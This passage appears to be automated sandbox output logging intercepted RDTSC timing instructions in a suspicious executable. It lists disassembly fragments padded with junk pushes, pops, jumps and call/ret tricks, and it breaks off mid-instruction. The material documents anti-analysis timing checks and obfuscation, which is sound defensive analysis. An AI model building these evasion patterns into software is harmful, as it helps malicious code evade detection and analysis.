Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635DC6 second address: 635DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 636D6C second address: 636D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCBA46BC736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633E98 second address: 633EC1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBA4817E80h 0x00000008 jmp 00007FCBA4817E7Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FCBA4817E82h 0x00000018 jmp 00007FCBA4817E7Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633EC1 second address: 633ECB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCBA46BC73Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C95B second address: 62C966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FAF second address: 638FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FB3 second address: 638FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FBB second address: 638FD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FCBA46BC740h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FD0 second address: 638FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FD8 second address: 638FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FDE second address: 639003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA4817E83h 0x0000000e push edi 0x0000000f je 00007FCBA4817E76h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 639003 second address: 639008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 639008 second address: 639012 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBA4817E7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E66E second address: 63E67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FCBA46BC73Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E67D second address: 63E6BB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCBA4817E7Ah 0x00000008 jp 00007FCBA4817E78h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FCBA4817E82h 0x00000019 jmp 00007FCBA4817E80h 0x0000001e popad 0x0000001f push esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC46D second address: 5CC492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCBA46BC736h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FCBA46BC743h 0x00000013 pop edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC492 second address: 5CC498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642263 second address: 64228F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC73Fh 0x00000009 jmp 00007FCBA46BC744h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64228F second address: 642293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642293 second address: 6422F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FCBA46BC745h 0x0000000f jne 00007FCBA46BC736h 0x00000015 pop ebx 0x00000016 jo 00007FCBA46BC741h 0x0000001c jmp 00007FCBA46BC73Bh 0x00000021 popad 0x00000022 push ebx 0x00000023 jmp 00007FCBA46BC742h 0x00000028 push eax 0x00000029 push edx 0x0000002a push edx 0x0000002b pop edx 0x0000002c push edi 0x0000002d pop edi 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6422F1 second address: 6422FB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA4817E76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 641948 second address: 64195C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 je 00007FCBA46BC736h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64195C second address: 641988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jo 00007FCBA4817E9Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FCBA4817E76h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 641988 second address: 64198C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 646B14 second address: 646B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D732 second address: 64D74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jp 00007FCBA46BC736h 0x0000000c ja 00007FCBA46BC736h 0x00000012 push edi 0x00000013 pop edi 0x00000014 jnp 00007FCBA46BC736h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D74D second address: 64D76C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E80h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA4817E7Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C541 second address: 64C547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C547 second address: 64C54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C54C second address: 64C551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C551 second address: 64C559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64CB47 second address: 64CB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCBA46BC736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64CDB6 second address: 64CDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64CDBA second address: 64CDD8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCBA46BC736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FCBA46BC73Ch 0x00000012 pop eax 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D40F second address: 64D415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D415 second address: 64D419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D59B second address: 64D59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D59F second address: 64D5B1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FCBA46BC736h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D5B1 second address: 64D5D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007FCBA4817E76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6514A2 second address: 6514C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC748h 0x00000009 pop edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF86F second address: 5CF874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF874 second address: 5CF879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF879 second address: 5CF883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655976 second address: 655980 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA46BC736h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655980 second address: 655986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655986 second address: 65599E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBA46BC738h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FCBA46BC736h 0x00000012 jp 00007FCBA46BC736h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65599E second address: 6559B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E87h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65B7 second address: 5D65BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65BF second address: 5D65C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65C3 second address: 5D65E2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FCBA46BC738h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jc 00007FCBA46BC75Ah 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65E2 second address: 5D65ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65ED second address: 5D65F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65470F second address: 654731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E88h 0x00000007 jns 00007FCBA4817E76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654731 second address: 65473D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FCBA46BC736h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65473D second address: 654741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623033 second address: 623084 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FCBA46BC73Bh 0x0000000e nop 0x0000000f mov di, 3306h 0x00000013 lea eax, dword ptr [ebp+12482DDCh] 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FCBA46BC738h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 jg 00007FCBA46BC736h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623084 second address: 623089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623089 second address: 602FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FCBA46BC738h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov ecx, eax 0x00000026 mov dx, si 0x00000029 call dword ptr [ebp+122D28EBh] 0x0000002f jc 00007FCBA46BC74Dh 0x00000035 jo 00007FCBA46BC738h 0x0000003b push esi 0x0000003c pop esi 0x0000003d push ecx 0x0000003e push esi 0x0000003f pop esi 0x00000040 jmp 00007FCBA46BC73Bh 0x00000045 pop ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push edx 0x0000004a pop edx 0x0000004b jg 00007FCBA46BC736h 0x00000051 push edi 0x00000052 pop edi 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236AF second address: 6236B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236B5 second address: 6236BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236BB second address: 6236E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 318B15D5h 0x0000000f push ecx 0x00000010 sub dword ptr [ebp+122D2157h], esi 0x00000016 pop edx 0x00000017 call 00007FCBA4817E79h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jno 00007FCBA4817E76h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236E7 second address: 6236F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA46BC73Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236F5 second address: 623751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007FCBA4817E80h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jnp 00007FCBA4817E84h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jmp 00007FCBA4817E88h 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623920 second address: 623924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623924 second address: 62392A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623A36 second address: 623A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623A3C second address: 623A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623C6D second address: 623C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623C79 second address: 623C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623C7D second address: 623C83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623C83 second address: 623CBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+1244BA99h], edi 0x0000000f or dword ptr [ebp+122D1C48h], edi 0x00000015 push 00000004h 0x00000017 or dword ptr [ebp+1244DADBh], ecx 0x0000001d nop 0x0000001e jmp 00007FCBA4817E88h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 pop edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623CBF second address: 623CDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FCBA46BC736h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624337 second address: 62435E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FCBA4817E88h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62435E second address: 624363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624363 second address: 62436D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBA4817E7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62436D second address: 62437C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62450A second address: 624510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624510 second address: 603BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FCBA46BC738h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 call dword ptr [ebp+122D17D4h] 0x0000002c jmp 00007FCBA46BC746h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push e